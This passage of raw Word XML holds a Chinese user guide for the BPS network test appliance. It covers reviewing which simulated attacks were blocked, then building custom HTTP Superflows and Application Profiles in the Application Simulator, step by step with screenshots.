          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E0201E2" wp14:editId="6E0EFE89">
            <wp:extent cx="5214155" cy="2877502"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="29734"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jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId410" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5214155" cy="2877502"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>18、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在这里，我们可以通过展开左侧的列表，详细的看到具体的哪些攻击威胁被允许通过了，哪些威胁攻击被阻断成功了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5047B9E4" wp14:editId="6AB33DDC">
            <wp:extent cx="5201285" cy="2960370"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2973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201285" cy="2960370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="114" w:name="_Toc499884741"/>
      <w:r w:rsidRPr="002A0C5E">
        <w:t>Application Simulator 组件的测试使用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="114"/>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BPS  是一个非常灵活的软件，我们可以通过手工去创建自己想要的应用层协议，并且对该协议的内容进行手工定义</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，从而构造我们想要的流量报文，可以通过这种方式定义匹配特征的攻击报文，下面介绍一下通过BPS测试仪自定义应用层流量的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>参照章节二的端口占用以及章节三中的 1~6 步完成 Neighborhood 的创建</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>点击 Managers-Super flows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Superflow 在 BPS 软件中可以定义为应用层内容库，在这里会存有 BPS 内置的大量应用层协议模板，也会保存用户自己平时手工添加的应用层配置。先点击 Create New 去创建自己的应用层配置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>点击截图中的 Add Flow 位置，这里是先确定你需要添加的协议种类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="003E2FD5" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="0053045B" w:rsidRPr="003E2FD5">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="142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164E5AEA" wp14:editId="570290EF">
            <wp:extent cx="5240247" cy="3141726"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="297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12" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5240247" cy="3141726"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在新的截图中会显示目前 BPS 所支持的所以协议种类，可以通过搜索来添加自己希望创建的协议，在这里举例搜索 HTTP，添加一个 HTTP 协议</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="003E2FD5" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="187EF712" wp14:editId="59D923A3">
            <wp:extent cx="5224145" cy="4311015"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="297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24145" cy="4311015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>通过展开，可以看到 HTTP 所支持的通用协议参数都可以在这里去修改</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="0053045B" w:rsidRPr="002A0C5E">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="142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7A390398" wp14:editId="784BE72F">
            <wp:extent cx="5233932" cy="1190148"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="2973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14" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5233932" cy="1190148"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>点击截图位置中的 Add Action，这里是添加该协议中定义的动作，比如 HTTP 协议中会有 GET，PUT，POST 等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="003E2FD5" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12F0F7C7" wp14:editId="415E50F4">
            <wp:extent cx="5240020" cy="3141345"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="297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rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>先添加一个 GET 动作，在这里的 Source 指的是由Client 发起的动作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="0053045B" w:rsidRPr="002A0C5E">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="156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5A547B4D" wp14:editId="760B30EE">
            <wp:extent cx="5273211" cy="4456557"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1270"/>
            <wp:docPr id="2974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16" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5273211" cy="4456557"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>再</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>添加</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>一个 200</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>K 的Response，这里的 Source 则是由 Server 端发起</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="0053045B" w:rsidRPr="002A0C5E">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="150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2661133F" wp14:editId="752C2A3B">
            <wp:extent cx="5257496" cy="4371879"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="297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7" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5257496" cy="4371879"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>通过展开，我们可以发现GET 动作所定义协议的字段</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>和response里面的字段</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>都是</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>开放可以修改的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A5D0B2D" wp14:editId="1E828D00">
            <wp:extent cx="5240020" cy="3141345"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="297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rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>11、如下图所示，</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Response 可以直接定义回复的响应大小，这里填写的值会回复 22k 的大小</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1167EFB3" wp14:editId="5B63706E">
            <wp:extent cx="5240020" cy="3141345"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="297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rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>13、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Response 也可以回复真实的文件，可以使用 BPS 内置的文件，可以通过右侧的上传符号去上传本地文件进行回复</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10DD13F7" wp14:editId="0C53A2B5">
            <wp:extent cx="5240247" cy="3141726"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="2974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20" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5240247" cy="3141726"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>14、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>根据需要填写完参数以后点击save 进行保存</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>15、现在再</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>点击 Managers-Application Profiles</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>16、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>点击Create New 去创建一个新的 Application Profiles，Application Profiles 可以理解为单个或多个 Superflow 的集合</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>17、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>新界面中点击 Add Superflow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F95A12A" wp14:editId="2A54B6EE">
            <wp:extent cx="5240020" cy="3141345"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="2974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rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>18、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>通过搜索刚才手工创建的 Superflow 名称，点击 ok</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EFA86E1" wp14:editId="3C1524FA">
            <wp:extent cx="5281650" cy="3265741"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="297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422" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5281650" cy="3265741"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>19、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>如果需要做混合应用层测试，可以使用同样的步骤添加不同的混合协议，这些协议可以自己手工添加制作，也直接调用 BPS 里面内置的模板</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>20、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>不同的协议之间我们还可以通过调整 Weight 值去控制不同协议之间的带宽比例。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="003E2FD5" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1238705A" wp14:editId="1A3AE4E5">
            <wp:extent cx="5211445" cy="2851785"/>
            <wp:effectExtent l="0" t="0" r="8255" b="5715"/>
            <wp:docPr id="297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211445" cy="2851785"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>21、</w:t>
      </w:r>
